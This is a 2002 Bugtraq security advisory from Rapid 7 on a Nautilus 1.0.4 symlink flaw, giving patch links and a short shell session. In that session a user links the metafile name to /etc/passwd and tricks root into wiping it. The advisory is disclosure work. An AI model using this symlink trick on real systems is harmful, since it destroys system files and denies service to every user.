From jtesta@rapid7.com Thu May 2 20:25:00 2002 From: Joe Testa To: bugtraq@securityfocus.com Date: Thu, 02 May 2002 16:13:50 -0400 Subject: R7-0003: Nautilus Symlink Vulnerability [ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the signature. See attached file for signed version.] _______________________________________________________________________ Rapid 7, Inc. Security Advisory Visit http://www.rapid7.com/ to download NeXpose(tm), our advanced vulnerability scanner. Linux and Windows 2000 versions are available now! _______________________________________________________________________ Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability Published: 05/02/2002 Revision: 1.0 CVE ID: CAN-2002-0157 Bugtraq ID: 4373 1. Affected system(s): KNOWN VULNERABLE: o Nautilus 1.0.4 Apparently NOT VULNERABLE: 2. Summary Nautilus is a graphical shell for GNOME. It contains a vulnerability which would allow a malicious user to mount a symlink attack to overwrite another user's files. 3. Vendor status and information Nautilus Eazel, Inc. http://nautilus.eazel.com/ The Nautilus team was notified on 03/26/2002. 4. Solution Upgrade to the latest version of Nautilus, available at http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate patch: RedHat 7.2: SRPMS: ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm i386: ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm ia64: ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm Slackware: ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/ 5. Detailed analysis When copying files from one directory to another, Nautilus creates a small (88+ bytes) XML file called '.nautilus-metafile.xml' in the target directory. It does not check if a symlink with the same name already exists there, and blindly writes XML data to it. The following example shows how to cause a system-wide denial of service attack with this vulnerability: [jdog@imisshogs jdog]$ pwd /home/jdog [jdog@imisshogs jdog]$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...snip...] jdog:x:500:500::/home/jdog:/bin/bash [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml [jdog@imisshogs jdog]$ mail root Subject: Yo. Could you please copy "creepy-in-new-york.doc" to my home directory (/home/jdog)? Thanks. - Joe Cc: [jdog@imisshogs jdog]$ sleep 86400 [jdog@imisshogs jdog]$ ls -l *.doc -rw-r--r-- 1 root root 13 Mar 24 18:09 creepy-in-new-york.doc [jdog@imisshogs jdog]$ cat /etc/passwd [jdog@imisshogs jdog]$ 6. Contact Information Rapid 7 Security Advisories Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 7. Disclaimer and Copyright Rapid 7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby granted to redistribute this advisory in electronic media only, providing that no changes are made and that the copyright notices and disclaimers remain intact. This advisory may not be printed or distributed in non-electronic media without the express written permission of Rapid 7, Inc. [Part 2, Text/PLAIN 141 lines] [Unable to print this part]